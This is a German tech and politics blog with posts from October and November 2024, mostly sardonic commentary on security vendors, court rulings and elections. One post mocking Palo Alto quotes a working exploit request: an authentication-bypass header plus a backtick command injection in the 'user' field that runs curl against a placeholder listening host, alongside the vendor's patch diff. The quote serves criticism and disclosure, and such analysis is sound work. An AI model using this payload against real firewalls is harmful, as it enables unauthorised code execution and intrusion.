Fefes Blog

Wer schöne Verschwörungslinks für mich hat: ab an felix-bloginput (at) fefe.de!

Fragen? Antworten! Siehe auch: Alternativlos

Wed Nov 20 2024

[l] Im Moment kursieren (natürlich!) Anschuldigungen des Wahlbetrugs in den USA.
Hier ist der seriösere der offenen Briefe.
Der Zug ist abgefahren. Biden und Harris hatten JAHRE Zeit, das Wahlsystem zu reformieren. Haben sie nicht gemacht. Weil sie dachten, vielleicht, dass ihnen das Herrschaftswissen selber mal nutzen würde.
Geliefert wie bestellt. Ich habe kein Mitleid und keinen Drang da irgendwas aufgeklärt zu kriegen. Das war ihre Chance und sie haben es verkackt.
So und nur so funktioniert Evolution. Wenn man sich aus verkacktem Verhalten wieder rausschleimen kann, funktioniert das nicht. Das muss tödlich sein und die nächste Generation hat dann hoffentlich was gelernt. Oder sie ereilt, genauso verdient, dasselbe Schicksal.
Ich positioniere mich immer gerne so, dass ich danach Told You So sagen kann. Well... Told You So. Nein, ich werde euch jetzt nicht helfen, die Auswirkungen eures nicht auf mich hörens zu verringern.

Tue Nov 19 2024

[l] Ich habe vor einer Weile angefangen, Compliance-Bullshit als Kunstförderung zu bezeichnen, weil es halt reines Theater ist und nichts bringt.
Jetzt überlege ich, ob ich nicht auch zu typischen Sicherheitslücken einfach Retrocomputing sagen sollte, weil das genau derselbe Scheiß ist, über den wir schon in den 1980er Jahren gelacht haben.
Aktuelles Beispiel: Palo Alto. Ja, die schon wieder. SCHON WIEDER. Ich hab auch keinen Bock mehr.
```
X-PAN-AUTHCHECK: off
```
Ich wünschte, ich würde Witze machen.
```
POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1
```
Und was fiel da raus? Richtig! Eine gültige Session-ID!
Die haben einfach ein diff gemacht von dem Patch, auf dem Palo Alto jetzt wochenlang saß, während ihre Kunden fröhliche exploitet wurden.
```
+    $user = $_POST['user'];

+    if (strlen($user) <= 63

-            $_POST['user'],
+            $user,
```
Die neue Eingabevalidierung ist ... eine Längenbegrenzung. Nein, wirklich!
Ich wünschte, ich würde Witze machen.
```
-    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");
+    $u = $s->escapeshellarg($username);
+    return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $u");
```
Wisst ihr was? You had me at PHP. (via)
[l] Kann Palo Alto noch tiefer ins Klo greifen? Aber ja doch! Die Lücke, mit der seit Wochen ihre Kunden aufgemacht werden, die wollen sie jetzt selbst gefunden haben, und damit es nicht so übel aussieht, wie lange die auf dem Bug saßen, haben sie das Advisory auch vordatiert auf gestern, obwohl es das Advisory von vor zwei Wochen ist.
Das war bestimmt ein bedauerlicher Softwarefehler oder so. Oder menschliches Versagen. Dafür sind Palo Alto ja Spezialisten.
Auch dass da "Automatable: NO" steht ist glatt gelogen. Macht nur keiner, weil das einfach eine PHP-Seite ist, die das Admin-Passwort auf "palo alto" zurücksetzt, wenn ich das nicht mit einer anderen Palo-Alto-Lücke gerade verwechsele. Anderswo würde man das als Backdoor bezeichnen, nicht als "Lücke".
Aber hey, was reg ich mich auf. Ihr werdet alle weiter bei denen kaufen, und die werden keinen Druck haben, bessere Produkte zu bauen.
Das Hauptinteresse der Passanten gerade lässt sich offensichtlich befriedigen, indem man eine Liste von IPs als "IoC" verteilt. Wenn mir das vor 20 Jahren jemand als Scifi-Plot angeboten hätte, hätte ich ihn aus dem Raum gelacht.
Update: Ich habe das mit dem anderen Palo-Alto-Müll verwechselt. Hier brauchte man mehrere trivial automatisierbare Schritte.
[l] „Operationsplan Deutschland“ – Bundeswehr bereitet Unternehmen auf Kriegsfall vor.
Es handelt sich, natürlich, um einen Stapel Papier, in der ersten Fassung ca 1000 Seiten lang.
Primärquelle ist die FAZ, aber die hat sich ja mit ihrer Paywall selbst ins Aus geschossen, lizenziert aber ihre Inhalte an Microsoft, daher geht der Link oben zu MSN. Herzlichen Glückwunsch, FAZ. Geniale Strategie.
Ich für meinen Teil bin erleichtert, dass die Bundeswehr immerhin noch Papier produzieren kann. Auch wenn das vermutlich McKinsey für sie gemacht haben wird.
Was steht da so drin? Die FAZ zitiert einen brandheißen Tipp:
„Bilden Sie auf hundert Mitarbeiter mindestens fünf zusätzliche Lkw-Fahrer aus, die Sie nicht benötigen“, lautet sein Vorschlag nach F.A.Z.-Informationen.
Der Grund für die Maßnahme: „70 Prozent aller Lastwagen auf Deutschlands Straßen werden von Osteuropäern bewegt. Wenn dort Krieg ist, wo werden dann diese Leute sein?“
Diese Scheiß Osteuropäer immer! Nur weil zuhause ein bisschen Krieg ist, vernachlässigen die ihre Pflichten uns gegenüber!? Alle ausweisen!1!!
Scheiß Nordkoreaner immer! (Danke, Manuel)

Fri Nov 15 2024

[l] Gibt noch mehr zu lachen über Fortinet und ihre Kunden. Das ist von einer dieser Security-Klitschen, die ihren Kunden Signaturen für Angriffe gegen ungepatchte Exploits verkaufen. Die sahen den letzten Fortinet-Exploit und dachten sich: Das reproduzieren wir mal.
in the process of doing so, we came across some new issues that changed our view of the vulnerability significantly. In particular, we found a new vulnerability, which we’ve termed ‘FortiJump Higher’. We also found two file overwrite vulnerabilities which could be leveraged to crash the system. The low complexity of these vulnerabilities brings into question the overall quality of the FortiManager codebase.
Ich weiß was ihr jetzt denkt! "question the overall quality of the FortiManager codebase"?! Was sind denn da bitte noch für Fragen offen!?
Jedenfalls keine bei Angreifern, denn völlig überraschend stellt sich raus, dass die frisch entdeckten Lücken schon von Kriminellen als Breitensport ausgenutzt wurden.
Most importantly, the original FortiJump vulnerability is under active, mass exploitation right now.
Aber nicht doch, mein Herr!
Mit Freunden wie Fortinet brauchst du keine Feinde mehr. Überlegt mal, was das heißt, wenn die Angreifer nicht mehr nach Lücken in MS Office suchen, weil Fortinet exploiten so viel leichter ist.
Additionally, we firmly believe that, based on our analysis and in our opinion, Fortinet’s patch for FortiJump vulnerability is incomplete
Un-denk-bar! Fortinet kann nicht nur beim Entwickeln nichts sondern die sind auch beim Patchen bloß herumtölpelnde Pfuscher?! NA SOWAS! Hätte uns nur jemand vor Schlangenöl-Produkten gewarnt!
Update: Die technisch versierteren unter euch sollten sich den Bug mal angucken, den sie da beschreiben. Die nehmen unvalidierte Eingaben vom Angreifer und rufen damit system() auf. So haben wir schon vor 40 Jahren Rechner aufgemacht. Kannst du dir nicht ausdenken.
Update: Bei Heise ist Fortinet inzwischen nicht mehr unter Security sondern unter WTF eingeordnet :-) (Danke, Christopher)

Thu Nov 14 2024

[l] Eben erst verlinkte ich das Habeck-Söder-Video, und jetzt passiert das: Habeck strandet mit Regierungsflieger.
Ich weiß was ihr jetzt denkt. Wieso setzen die denn da auch so uralte Antiquitäten von Flugzeugen ein?!?
Vor dem Start des Airbus A350 hatte der Kapitän den Minister und die Mitreisenden über die Panne an der nur fünf Monate alten Maschine informiert.
Oh. Äh. Dann ist das wohl eine ganz normale Infrastrukturapokalypse. Kann man nichts machen.
Der Einsender fragt, wer da die Wartung gemacht hat. Die CSU? Habecks Abwesenheit am Mittwoch hat wohl dazu geführt, dass seinen Slot der Söder übernommen hat. Ausgerechnet.

Wed Nov 13 2024

[l] Ich rege mich ja gerne und häufig über hohles Marketing-Blablah von Security-Firmen auf, die dann hintenrum wissentlich Schrott produzieren und verkaufen.
Ein aktueller Hohlphrasen-Trend heißt "Secure by Design". Klingt eigentlich erstmal wie eine gute Idee, bis einem auffällt, dass da niemand etwas konkretes oder hilfreiches drunter versteht. Das ist einfach wie so ein Bullshit-Prüfsiegel-GIF im Web, das man auf seine Webseite pappt, damit die Kunden ein wohliges Gefühl haben.
Man kann das auch ernsthaft betreiben, klar. Ich halte seit einiger Zeit Vorträge darüber, wie ich konkret mein Blog so gebaut habe, wie ich mir Secure by Design vorstelle. Das ist allerdings transformativ. Das ist nichts, was man nachträglich dranflanscht. Man überlegt sich die Dinge vorher, damit das am Ende passt.
In meinem Blog habe ich eine Kombination aus Self-Sandboxing (Blog hat keinen Zugriff aufs Dateisystem, darf nur nach stdout schreiben und keine Sockets aufmachen) implementiert, und beim Anmelden prüft das Blog gar nichts sondern reicht die Credentials durch zum LDAP. Blog-Prozesse können sich gegenseitig nicht sehen.
Ergebnis: Ich könnte euch eine Shell-Kommandozeile im Blog einbauen und ihr könntet damit nichts machen, weil das Blog auch keine Prozesse starten kann und gegenüber dem LDAP nur mit den Zugriffsrechten angemeldet ist, die ihr über Bedienung des Blog-CGIs auslösen könnt. Das verstehe ich unter Secure by Design.
Wieso hole ich diese alten Kamellen raus? Weil mir gerade jemand diesen Artikel zu Secure by Design in der Industrie geschickt hat. Wie immer, wenn man inhaltlich nichts in der Hand hat, greift der Marketing-Experte zu "social proof" und listet zufriedene oder erfolgreiche Kunden. In diesem Fall Firmen, die Secure by Design erfolgreich umgesetzt haben.
Setzt euch mal stabil hin kurz:
The Cybersecurity and Infrastructure Security Agency’s (CISA) secure-by-design pledge has hit its six-month mark, and companies that took the pledge say they’ve made significant security improvements since they signed onto the initiative.
CISA ist sowas wie das BSI der USA. Eine Bundesbehörde. Und CISA ist hochzufrieden, dass ihr Compliance-Theater von der Industrie Kunstförderung erhält:
Jack Cable, a senior technical adviser at CISA, told Recorded Future News in a newly published Q&A about the project, which he said has “exceeded expectations.”
Gut, das heißt natürlich nichts. Die Erwartungen könnten auch negativ gewesen sein, so dass schon "keiner tut was" die Erwartungen übertroffen hätte. Aber seien wir mal kurz nicht so zynisch. Er nennt fünf konkrete Firmen.
Amazon Web Services
Fortinet
Microsoft
Okta
Sophos
Nein, wirklich! Das sind die fünf hervorstechenden Erfolgsgeschichten für Secure by Design!
Und was haben die am Ende gemacht, um Secure by Design behaupten zu können jetzt? Sie haben ihren Opfern, äh, Kunden MFA reingedrückt!
Und MFA ist meiner Ansicht nach Security-Theater. Tut nichts für eure Sicherheit und erlaubt den gehackten Firmen so zu tun, als sei das deine Schuld, weil du ihnen Passwörter anvertraut hast statt MFA zu machen.
Wenn eine Firma dich zu MFA nötigen will, denkt immer daran, wie Firmen nach Hacks sagen, "aber die Kreditkartennummern sind nicht weggekommen". Warum sind die nicht weggekommen? Weil das teuer würde für die Firma. Alle anderen Daten? Da scheißen die drauf, wenn die wegkommen. Ist ja euer Schaden, nicht ihrer.
[l] Habt ihr euch Sorgen gemacht, dass den Russen die Wehrpflichtigen ausgehen könnten? Keine Sorge! Das Oberverwaltungsgericht Berlin sorgt für Nachschub!
Das Gericht argumentiert, dass dem Kläger in Tschetschenien zwar eine Zwangsrekrutierung zum Einsatz in der Ukraine drohe. Es könne ihm aber zugemutet werden, dass er sich anderswo in Russland niederlässt.
Dort könne er wie andere junge Männer zwar zum Grundwehrdienst eingezogen werden, erkennt das Gericht an. Das Richtergremium führt aber eine Reihe von Gründen an, warum dies keinen Schutz vor Abschiebung rechtfertige. So heißt es, dass es aktuell keine Hinweise auf eine Teilnahme russischer Grundwehrdienstleistender an Kampfhandlungen in der Ukraine gebe. Sie würden zum Grenzschutz entlang der Grenze zur Ukraine und auf der Krim eingesetzt.
Und das weiß ja wohl jeder: Die Kampfhandlungen finden nicht an der Grenze statt. Sie verschieben höchstens die Grenze in das feindliche Territorium hinein. Vorwärtsverteidigung!
Dann führt das Richtergremium aus, dass eine Teilnahme an Kampfhandlungen in Russland der Verteidigung eigenen Territoriums diene und "keine unmenschliche oder erniedrigende Behandlung" im Sinne des Artikel 3 der Europäischen Menschenrechtskonvention darstelle, die rechtliche Grundlage für den Schutzstatus in Deutschland ist.
Nee, klar. Ich vermute mal, die Richter sind lange nicht mehr zum Wehrdienst eingezogen worden.

Mon Nov 11 2024

[l] Achtet mal darauf, wie die CDU (die ja mehrere Landesregierungen in Koalition mit den Grünen hat) ihren Zwergpinscher Söder gegen Habeck losschickt.
Die haben erkannt, wer der einzige seriös aussehende Kanzlerkandidat im Moment ist, und müssen ihn angreifen, aber brauchen für ihre Landeskoalitionen plausible deniability.
Und jetzt pinkelt auch noch Elon Musk gegen den Wind in Richtung Habeck.
Freut mich, dass die alle erkannt haben, wer hier der einzige satisfaktionsfähige Kanzlerkandidat ist. Wobei das bei dem Söder auch einfach Rachegelüste sein könnten, dafür wie krass Habeck ihn im Februar öffentlich rundgemacht hat (Achtung: Tiktok-Link mit nerviger Hintergrundmucke).
Update: Ein Leser hat ein Video der Habeck-Söder-Debatte gefunden.
Update: Falschen Videolink korrigiert.

Sun Nov 10 2024

[l] Ich bin ja mit meinem Blog nicht nur ein Sammler von Verschwörungstheorien, ich bin auch eine Cassandra in der IT-Security-Branche. Seit Jahrzehnten sage ich, dass Antiviren die Angriffsoberfläche nicht senken sondern erhöhen, dass das ein falsches Versprechen von Sicherheit ist, dass sich Leute von "Metriken" blenden lassen, die von voreingenommener Seite produziert und vorgelegt werden, und dann falsche Entscheidungen treffen.
Bei Verschwörungstheorien beobachte ich immer begeistert, wie jahrelanges Wegleugnen eines Tages spontan umspringt, entweder zu "haben wir doch schon immer gewusst" (hat sich aber nie im Handeln niedergeschlagen und wurde die ganze Zeit nach Kräften geleugnet!), oder, noch schlimmer, zu "haben wir doch schon immer gesagt" (eine glatte Lüge).
Umso erfreulicher für mich in letzter Zeit, wie sich bei Kernthemen von mir langsam herauskristallisiert, dass wir uns diesem Kipppunkt nähern.
Heise-Kommentar: Sophos und der gebrochene Schwur. Was ist der gebrochene Schwur? Dass Sophos Malware an ihre Kunden verteilt hat, um angebliche chinesische Hacker auszuspionieren, die ihre kaputte Sophos-Software genutzt haben, um Sophos-Kunden anzugreifen. Hier mein Kommentar zu der Sophos-Nummer, als die ganz frisch war. Jürgen Schmidt, Chef von Heise Security, dazu:
Sie haben selbst Spionage-Software entwickelt und die gezielt auf Systemen von Kunden platziert, um diese auszuforschen. Das war eigentlich ein ungeschriebenes Gesetz der Branche: Wir entwickeln keine Malware und insbesondere setzen wir sie nicht ein, um unsere Kunden auszuspionieren.
Ich würde noch einen Schritt weiter gehen und sagen: Das war schon immer Malware. Gut, ich habe da Einblicke, die vielleicht nicht jeder hat. Ich weiß, wie so "Antiviren" funktionieren, und was für Methoden die verwenden, um Kernel-Calls zu hooken und ihren Code in Prozesse zu injecten. Das ist genau das, was eine Verhaltens-Anomalie-Erkennung sofort als Malware flaggen würde. Daher haben die Antiviren Whitelists drin, um sich nicht gegenseitig zu flaggen, und warnen explizit davor, nur eine "Endpoint Security" zur Zeit zu installieren, und deshalb schaltet Norton erstmal den MS Defender aus. Der würde nämlich alle Alarmglocken zünden, wenn Norton tut, was Norton halt so tut. Norton hier als Stellvertreter für alle Antiviren.
Wenn man das weiß, dann wird spontan klar: Das war schon immer Malware, die sich Rechte rausnimmt, die man im System niemandem zugestehen sollte, schon gar nicht Vertriebsgetriebenen Firmen wie Antivirenherstellern.
Dieses ungeschriebene Gesetz, das Jürgen hier zitiert, das gab es noch nie. Das war schon immer ein Trust Me I Know What I'm Doing, und genau wie bei Wurstproduktion will der Konsument da gar nicht so genau hingucken, weil er weiß: Wenn er wüsste, was da passiert, könnte er das Produkt nicht mehr konsumieren.
Ich für meinen Teil finde auch nicht glaubwürdig, dass Sophos diesen Übersprung dazu, mit krimineller Energie Malware an ihre Kunden auszuliefern und deren Systeme absichtlich weiter zu gefährden, nur in diesem einen Fall gegen die fiesen Chinesen einsetzt. Kriminelle Energie mateiralisiert sich nicht über Nacht. So viel kriminelle Energie muss man über Jahre hegen und pflegen. Nur eine durch und durch unvertrauenswürdige Firma würde auch nur erwägen, solche Methoden einzusetzen.
Überlegt euch auch mal, wie verbogen deren moralischer Kompass sein muss, damit sie das auch noch für eine gute Idee, das öffentlich zuzugeben und sich damit als Helden zu feiern zu versuchen.
Sophos steht hier als Stellvertreter für alle Antiviren. Glaubt mal gar nicht, dass irgendeiner von denen vertrauenswürdig ist.
Hier ist noch ein Kipppunkt-Indikator. Ein anderer Heise-Kommentator pflichtet mir bei, dass es ungefährlicher ist, für Entdecker von Sicherheitslücken, die im Darknet zu verkloppen als sie dem Verursacher zu melden. Ich persönlich habe seit mindestens 20 Jahren keine Sicherheitslücken mehr initiativ-gemeldet oder auch nur gesucht. Ich suche Sicherheitslücken, wenn mich der Hersteller dafür bezahlt. Wenn ich über eine stolpere, melde ich die nur wenn es sich um freie Software handelt. An Bug Bounty-Programmen nehme ich nicht teil.
Die Lobbyisten der Industrie haben die Rahmenbedingungen so gesetzt, dass ich auch allen anderen nur raten kann, es mir gleich zu tun. Anderes aktuelles Beispiel in dem Kontext waren die polnischen Eisenbahnhacker auf dem letzten CCC-Kongress.
Die mussten sich inzwischen vor Gericht einer Klage dieser Firma stellen. Ich bewundere deren Heldenmut, aber hätte ich nicht gemacht. Da wäre ich Trump-Wähler und würde den ganzen Apparat herunterbrennen sehen wollen, bevor ich wieder mitzuhelfen bereit wäre. Dankt CDU und FDP.
Auch da scheint sich inzwischen die Erkenntnis breit zu machen, dass ich die ganze Zeit Recht hatte, und es gibt jetzt den Versuch eines Reförmchens. Ich glaube es, wenn ich es sehe.
Wenn man bedenkt, wie viel billiger und besser wir das alles hätten haben können, wenn die Leute gleich auf mich hören würden. Aber Plan B greift auch: Aus Schmerzen lernen. In diesem Sinne: Geht ihr mal alle in die Cloud und macht Blockchain, IoT und "KI". Wir sehen uns in 10 Jahren wieder und weinen gemeinsam dem verbrannten Geld hinterher.

Thu Nov 7 2024

[l] Stell dir vor, du bist Microsoft, und keiner kauft dir deinen "KI"-Scheiß ab. Was tun?
Na was hat Microsoft denn in der Vergangenheit getan in solchen Fällen? Richtig! Sie haben ihre marktbeherrschende Position ausgenutzt und das mit irgendwas anderem in ein Paket gepackt und dann den Einzelkauf des anderen ohne das Paket nicht mehr angeboten!
So auch jetzt. Wenn keiner "Copilot Pro" kaufen will, dann packen wir das halt in das MS 362-Abo rein und machen das entsprechend teurer!1!!
Leider kann die EU da nichts machen, weil sie sich selber völlig unnötig komplett abhängig gemacht haben von Microsofts Produkten. Kein Produkt so schlecht, dass es nicht mit Steuergeldern gekauft würde.

Wed Nov 6 2024

[l] Scholz entlässt Lindner.
Äh, und nun? Jetzt wird Merz Kanzler oder wie? Weil das glaubt der ja wohl selber nicht, dass er bei Neuwahlen eine Chance hat.
Boah als wenn heute noch nicht genug kaputtgegangen wäre!
Update: Whoa, wir haben ja einen ... Kanzler! Und er hat eine Rede gehalten! Die Rede seines Lebens, würde ich sagen.
Ich fragte mich gar: Wer ist dieser Typ da im Fernsehen und was haben sie mit dem Scholz gemacht?!
[l] Mozilla Foundation lays off 30% staff, drops advocacy division
Das ist die Foundation. Firefox wird von der Mozilla Corporation gemacht.
[l] Wie angesagt macht es mir nicht die geringste Freude, dass Trump kurz vor dem Wahlsieg steht.
Auch fehlt mir gerade der jugendliche Optimismus von 2016, dass es vielleicht doch nicht so schlimm wird.
Es gibt da eine Menge wirklich unangenehmer Gedanken gerade. Vance ist ein Triebtäter, wie es damals Pence war.
Aber wie ist es mit der Aussicht für Europa? Die Ukraine ist dann ja wohl Toast, wenn ihr größter Beschützer wegfällt. Aber ich stelle mir gerade vor, wie Putin sich die Hände reibt, und sagt: Der Job in Amerika ist fertig. Da müssen wir nicht mehr destabilisieren. Jetzt kann unsere Destabilisierungsmaschine sich ganz Europa widmen!
Amerika ist natürlich auch Toast. Mit Impfgegner RFK als Gesundheitsminister und Elon "Vorschlaghammer" Musk als "Entbürokratisierer" ist schon abzusehen, wie das weitergehen wird.
Diese Wahl hat noch eine Sache ein für alle Mal klar gemacht: Die Wähler wollten Trump. Die haben Trump nicht trotz seiner Schwächen gewählt sondern wegen seiner Schwächen. Auch Argumente wie Abtreibung und Marijuana sind nicht einfach per se mehrheitsfähig. Die Leute wollten das und wir sollten daher auch kein Mitleid mit denen haben. Ist wie bei Brexit damals.
Update: Für die Palästinenser ist das natürlich auch eher apokalyptisch. Trump hatte Netanjahu gesagt, er solle halt tun, was er tun muss. Carte Blanche für den Gazastreifen. Vermutlich wird das die Palis in Europa befeuern, noch mehr Infrastruktur kaputtzumachen, und auch ihre letzten Freunde zu verlieren. Die Politik der Harris war auch schon katastrophal für die Palis.
Hoffentlich wird Berlin jetzt nicht von einer Kulturkampf-Einhörner-Flüchtlingswelle aus Kalifornien überrannt. Ich hörte, dass die schlaueren Einhörner alle nach Neuseeland flüchten, und hier in Berlin eher die nicht so schlauen rauskommen werden.
Update: Wenn ihr es noch nicht getan habt, solltet ihr jetzt noch schnell den Greg-Palast-Film über Georgia gucken. In der besten Demokratie, die man für Geld kaufen kann, haben sich die Milliardäre das Ergebnis gekauft, das sie haben wollten.

Tue Nov 5 2024

[l] Wo wir gerade bei harmlosen Schwarzpulverenthusiasten waren: Hier ist ein harmloser Artillerieenthusiast!
Die Bundespolizei hat bei Grenzkontrollen in Aachen einen ungewöhnlichen Fund gemacht: Ein 60-Jähriger transportierte auf einem Anhänger eine Artillerie-Kanone.
Der Nanny State belästigt schon wieder harmlose Sportschützen!1!! (Danke, Holger)

Mon Nov 4 2024

[l] Nicht nur in Hannover gibt es Security-Nichtschwimmer der Denkschule "ich kann es nicht also ist es unmöglich". Auch das LG Aachen hat sich solche Leute eingetreten (geht um den Fall Modern Solutions). Die hatten mehrere Mandanten in derselben Datenbank, die mit nacktem Arsch im Internet ging, und die Zugangsdaten waren in einem ausgelieferten Binary drin.
Hier die Aussagen der Staatsanwaltschaft, von einem Verfahrensbeobachter berichtet.
Es geht nur um dem SQL Zugriff, nicht um die angebliche Decompilierung. Ihm geht es um die Screenshots.
Zur Nutzung der credentials sagt er "es ist Lebensfremd das man so auf ein Datenbank zugreift"
Ooooh, das ist also lebensfremd, dass man auf eine Datenbank zugreift!1!!
Da fragt man sich ja schon, was die Staatsanwaltschaft den ganzen Tag macht. Faxe schicken nehme ich an.
Wenn ihr also in Deutschland auf derartig stümperhaft kaputtkonfigurierte Bauruinen von Softwaresystemen stoßt, dann versucht nicht denen zu helfen. Die Anreize, die Politik, Gerichte und Staatsanwaltschaften setzen, sind mehr als eindeutig. Es ist weniger riskant und profitabler, die Daten direkt im Darknet zu verkloppen. Der Standort Deutschland ist eh nicht mehr zu retten.
Was der Richter wohl sagen würde, wenn er merkt, dass sein Autoschlüssel auch in alle anderen Autos derselben Baureihe passt? Fände er dann auch, dass die Autohersteller schon alles in ihrer Macht liegende gemacht haben?
Unglaublich.
Im Kern geht es der Kammer darum ob ein Jedermann auf die Daten (SQL Datenbank) zugreifen kann. Das verneint in diesem Fall die Kammer.
Auf dem Screenshot der .exe Datei (in notepad) können sie als Laien nix entnehmen, sie haben es versucht und nix verstanden.
Es ist offensichtlich das Modern Solutions versucht hat (sic!) die Daten zu schützen. Die Schutzmaßnahmen waren für Experten wohl ein Witz, aber das ist irrelevant. Es gab den willen und einen Versuch, das ist durch das Kennwort evident.
Herzlichen Glückwunsch. Jedes Land hat die Regierung und die Richter, die es verdient hat.

Sun Nov 3 2024

[l] Wo wir gerade bei Katastrophen waren: Berlin-Lichtenberg hat eine Katastrophenübung gemacht. Die wollten mal gucken, wie die Rettungsorganisationen mit einem Berg von Leichen und Verwundeten umgehen würden im Notfall. Weil es ja möglichst nah am Ernstfall sein sollte, haben sie vorher nicht Bescheid gesagt.
Ergebnis: Die Hilfskräfte erschienen nicht zur Übung.
Laut der Deutschen Presse-Agentur (DPA) habe es Schwierigkeiten gegeben, freiwillig organisierte Dienste ausreichend zu mobilisieren, sagten Behördenvertreter, die den vorher geheim gehaltenen Ablauf beobachteten.
Der Himmel stehe uns bei, falls wir mal wirklich ein Problem haben.
Nach Beobachtungen von rbb-Reportern lagen die angeforderten 75 Statisten bereits als vermeintliche Opfer auf dem Boden. Wer aber nicht zur Übung kam, waren die Rettungskräfte der Hilfsorganisationen - also wurde die Übung nach mehreren Stunden abgebrochen. Die Komparsen wurden kurz nach 13 Uhr nach Hause geschickt.
Die armen Komparsen. Liegen da rum und spielen Leiche und keiner kommt. m(
Berlin bleibt stabil! Ein Wunder, dass so wenig passiert.

Fri Nov 1 2024

[l] Habt ihr das auch gehört? Riesiger Krankenstand plötzlich? Die Arbeitgeber nagen so gut wie an der Insolvenz?!
Nun, dafür gibt es eine einfache Erklärung:
„Dabei sind die Zahlen wahrscheinlich gar nicht drastisch gestiegen“, ist der Leiter des ZEW-Forschungsbereichs „Arbeitsmärkte und Sozialversicherungen“, Nicolas Ziebarth, überzeugt. Vielmehr seien sie Folge eines „statistischen Erfassungseffektes“.
Ach. Ach was? Wie kann denn das sein?!
„Seitdem die Arbeitsunfähigkeitsbescheinigungen (AU) seit 2022 elektronisch erfasst werden, werden auch die Krankenstände viel besser und genauer erfasst“, sagte Ziebarth dieser Redaktion. Zuvor landeten viele gelbe Zettel, die erkrankte Arbeitnehmer von ihren Ärzten erhalten haben, erst gar nicht beim Arbeitgeber, sodass diese dann auch nicht registriert wurden.
Da fällt es einem doch wie Schuppen aus den Haaren!1!!
Update: Ein Leser korrigiert:
da ist dem Redakteur ein Fehler unterlaufen. Der Arbeitgeber hat den Zettel meist bekommen, für den hat der Mitarbeiter den ja geholt. Die Kopie für die Krankenkasse, bei der die Statistik gemacht wird, blieb gerne mal liegen.
(Danke, Frank)

Wed Oct 30 2024

[l] Die Deutsche Bahn überzeugt mal wieder auf ganzer Linie.
Die haben heute Spam-Mails rumgeschickt an alle Deutschlandticket-Abonnenten. Man müsse da was abnicken weil das Ticket ja teurer wird und so.
Klickst du also auf den Link und ... timeout. Prüfen Sie Ihre Internet-Verbindung sagt die App.
OK dann halt im Browser. Zu Bahn.de, einloggen, dann die gut versteckte Abo-Webseite in den Accountsettings finden - Fehlermeldung. Die Klappspaten haben offenbar Oauth zwischen bahn.de und abo.bahn.de gemacht. Was zur Hölle. Das ist dieselbe fucking Domain ihr Spezialexperten! Ihr könnt die Cookies sehen! Wie bekloppt kann man sein!
Es ist ein unerwarteter Fehler aufgetreten oder der Dienst ist aktuell nicht verfügbar. Bitte überprüfen Sie Ihre Internetverbindung.
Was machen die eigentlich beruflich, die Techniker bei der Bahn?

Mon Oct 28 2024

[l] Fürs Archiv (und für Suchmaschinen): clang-tidy nervt mit Warnungen über memcpy herum, man solle lieber memcpy_s verwenden. Das ist natürlich grober Unfug und ein weitere glorreicher Verkacker / Rohrkrepierer von Microsoft.
memcpy_s ist im Annex K und optional und glibc implementiert das nicht. dietlibc implementiert das auch nicht, weil es das Äquivalent von Gendern für C ist. Bringt nichts, regt nur alle auf und macht Code weniger portabel.
Old and busted: memcpy(dest,src,bytecount);
New hotness: memcpy_s(dest,destsize,src,bytecount);
Ich habe persönlich beobachtet, wie sie das bei Windows per Fiat des Mufti eingeführt haben, und die Leute sich dann alle Makros gehackt haben, um memcpy(a,b,c) zu memcpy_s(a,c,b,c) umzuschreiben.
Anyway, wenn euch diese Warnungen so auf den Sack gehen wie mir, dann kriegt ihr die so weg:
```
$ cat ~/.clang-tidy
Checks: "-clang-analyzer-security.insecureAPI.DeprecatedOrUnsafeBufferHandling"
```
Ich hab keine Ahnung, wieviel Lack die clang-tidy-Leute saufen mussten, um sich diesen Scheiß schönzureden. Das bringt das ganze Projekt in Verruf, wenn sie statt sinnvoller Fehlerdiagnostik die Entwickler mit solchem Rotz nerven.
Im Übrigen, wenn ihr es noch nie gemacht habt, und unter Windows programmiert: Probiert doch mal aus, was passiert, wenn man memcpy_s so aufruft, dass destsize < bytecount ist. "Sicherer", my ass.

Wed Oct 23 2024

[l] Der BGH klotzt mal wieder ein unglaubliches Fehlurteil raus.
Wisst ihr, was die Panoramafreiheit ist? Nehmen wir mal an, an einem Laternenmast hat jemand einen Zettel angebracht. Den dürft ihr fotografieren und das Foto veröffentlichen, ohne den Anbringer um Erlaubnis zu fragen. Das ist keine Urheberrechtsverletzung, steht ausdrücklich so im Gesetz.
Nun hat ein Verlag einen Reiseführer rausgebracht, der Drohnen-Fotos von frei in der Landschaft herumstehenden Kunstwerken gemacht hat. Damit die Leute da hinfahren und sich das angucken. Damit mehr Leute die Kunst sehen.
Die Künstler sahen dadurch ihr Urheberrechtverletzt und klagten durch die Instanzen. Der BGH hat ihnen jetzt ... Recht gegeben! Begründung:
"Die deutsche Regelung erlaubt nach der Rechtsprechung des Bundesgerichtshofs nur Fotografien, die vom öffentlichen Ort aus gemacht werden, an dem sich das Werk befindet. Und die den Blick auf das Werk vom öffentlichen Ort aus wiedergeben, wie er sich dem allgemeinen Publikum bietet", hieß es dazu. Die Vorschrift erlaube hingegen keine Fotografien, die den Blick auf das Werk von einem für das allgemeine Publikum unzugänglichen Ort aus wiedergeben.
What the fuck?! Das erinnert an die Weltraumtheorie des BND, nur anders herum.
Falls ihr mal einen Blick ins Gesetz werfen wollt: Da steht nichts von "aber du musst auf dem Boden stehen".
Ich vermute mal, die Richter haben keine Drohnen. Werden wir wohl warten müssen, bis die Richter in Rente gehen und eine Generation nachrückt, die weniger schlimm technikignorant ist.
Hey, was ist denn, wenn jemand eine Kamera mit Selbstauslöser hochwirft? Oder von mir aus an einen Ballon hängt? Gab es schon, mit Video auf Youtube.
Was ist, wenn er Fotograf einfach ungewöhnlich hoch ist und mit hochgehaltenen Händen fotografiert? Dann ist die Kamera an auch einer nicht allgemein zugänglichen Position!1!!
Wie kommen solche Leute überhaupt ins Richteramt?! Haben die da keine Prüfungen!?
Update: Stellt sich raus, dass die BGH-Richter da lediglich schlechte Ideen ihrer Vorinstanzen übernommen haben. Schon länger warnen einschlägige Webseiten:
Eine Zuhilfenahme von Leitern oder Drohnen ist somit nicht möglich, auch wenn man sich damit auf öffentlichem Grund befindet.
